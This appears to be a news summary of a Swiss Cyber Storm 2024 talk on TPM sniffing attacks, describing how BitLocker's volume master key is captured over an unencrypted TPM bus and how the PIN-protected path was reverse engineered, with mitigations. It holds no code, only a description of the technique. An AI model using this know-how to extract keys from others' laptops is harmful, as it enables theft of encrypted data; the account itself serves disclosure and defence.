Swiss Cyber Storm Conference Discusses TPM Sniffing Attack Vulnerabilities
/ 4 min read
Quick take - The Swiss Cyber Storm conference in October 2024 showcased research on vulnerabilities in Trusted Platform Module (TPM) sniffing attacks, revealing how these attacks can exploit weaknesses in TPM connections to compromise BitLocker encryption, particularly on enterprise-grade laptops, and highlighting the limitations of using a Personal Identification Number (PIN) as an additional security measure.
Fast Facts
- The Swiss Cyber Storm conference highlighted vulnerabilities in Trusted Platform Module (TPM) sniffing attacks, which exploit unencrypted connections and low transmission speeds to capture decryption keys during the boot process.
- A research team improved the original TPM sniffing attack method, enabling the breaking of BitLocker encryption on enterprise laptops in just a few minutes, particularly effective on devices from Lenovo, HP, and Dell.
- A new project in early 2024 investigated BitLocker’s operation with an additional PIN protection, revealing that the PIN primarily serves as a verification mechanism rather than a decryption key.
- The research team reverse-engineered the EFI bootloader to analyze the VMK processing workflow, discovering that decryption employs AES-CCM with a MAC digest for security.
- Recommendations to mitigate risks include enabling cover detection in UEFI, using firmware TPMs in corporate laptops, and monitoring for suspicious activities, while emphasizing the need for additional authentication factors alongside PINs.
Swiss Cyber Storm Conference Highlights Vulnerabilities in Trusted Platform Module (TPM) Sniffing Attacks
On October 22, 2024, the Swiss Cyber Storm conference in Bern featured a presentation detailing vulnerabilities associated with Trusted Platform Module (TPM) sniffing attacks.
Overview of TPM Sniffing Attacks
These attacks have been documented for at least five years. They exploit two primary weaknesses in the connection of discrete TPMs to motherboards: the lack of encryption and the low transmission speed of the connection. Physical access to a computer allows attackers to capture the decryption key during the boot process, which can be accomplished using inexpensive hardware.
The research team behind the presentation conducted an initial experiment in 2020 to reproduce the original TPM sniffing attack, making improvements that significantly increased execution speed. The current method allows for the breaking of BitLocker encryption in just a few minutes, particularly effective on major enterprise-grade laptops from manufacturers like Lenovo, HP, and Dell. The Offensive Security division frequently employs this technique during engagements, especially when a laptop is temporarily borrowed from an employee.
New Research on BitLocker and TPM
In early 2024, a new research project was initiated to investigate how BitLocker operates when the TPM key is protected by an additional factor, such as a Personal Identification Number (PIN). Prior to this research, no publicly available tools existed to breach BitLocker in this configuration.
The project began with a penetration test on a laptop secured by a PIN. The team attempted a TPM sniffing attack to escalate privileges but was unable to retrieve the Volume Master Key (VMK) as anticipated. Traffic analysis during the tests revealed that accessing the VMK is similar to when BitLocker is configured in transparent mode. However, the response from the TPM differed; specifically, the unseal response when using a PIN did not include the VMK, suggesting that the PIN serves primarily as a verification mechanism rather than a decryption key.
Insights and Recommendations
Various attempts to decrypt the data returned by the TPM were unsuccessful, and the internal workings of BitLocker’s multi-factor authentication were found to be largely undocumented. To gain further insights, the research team decided to reverse engineer the component responsible for decryption. They identified that the EFI bootloader prompts the user for the PIN and retrieves the VMK. A debugging environment was established using IDA and VMWare to analyze early boot instructions.
The EFI module responsible for PIN entry was located through keyword searches, revealing that it is relatively small and comprised of low-level assembly code, complicating static reverse engineering efforts. Dynamic analysis was subsequently performed to elucidate the VMK processing workflow, which involves several steps, including nonce retrieval and key stretching. The stretching function for the PIN mirrors that used with a recovery key, involving hashing and salting techniques.
Decryption of the VMK employs the AES-CCM algorithm, utilizing a Message Authentication Code (MAC) digest to ensure successful decryption. A Python script was developed to automate this decryption process and extract the VMK.
The research highlights the limitations of relying on a PIN with BitLocker, indicating that a rogue employee could exploit this vulnerability. To prevent privilege escalation, the authors suggest enabling cover detection in UEFI, opting for corporate laptops equipped with firmware TPMs, and monitoring for suspicious activities on workstations as reasonable approaches to mitigate risks.
While the article asserts that using a PIN is not entirely foolproof, it remains advisable to require an additional authentication factor when utilizing BitLocker. The research project was conducted between July and August 2024, coinciding with a similar study released by another researcher during the publication period.
Original Source: Read the Full Article Here
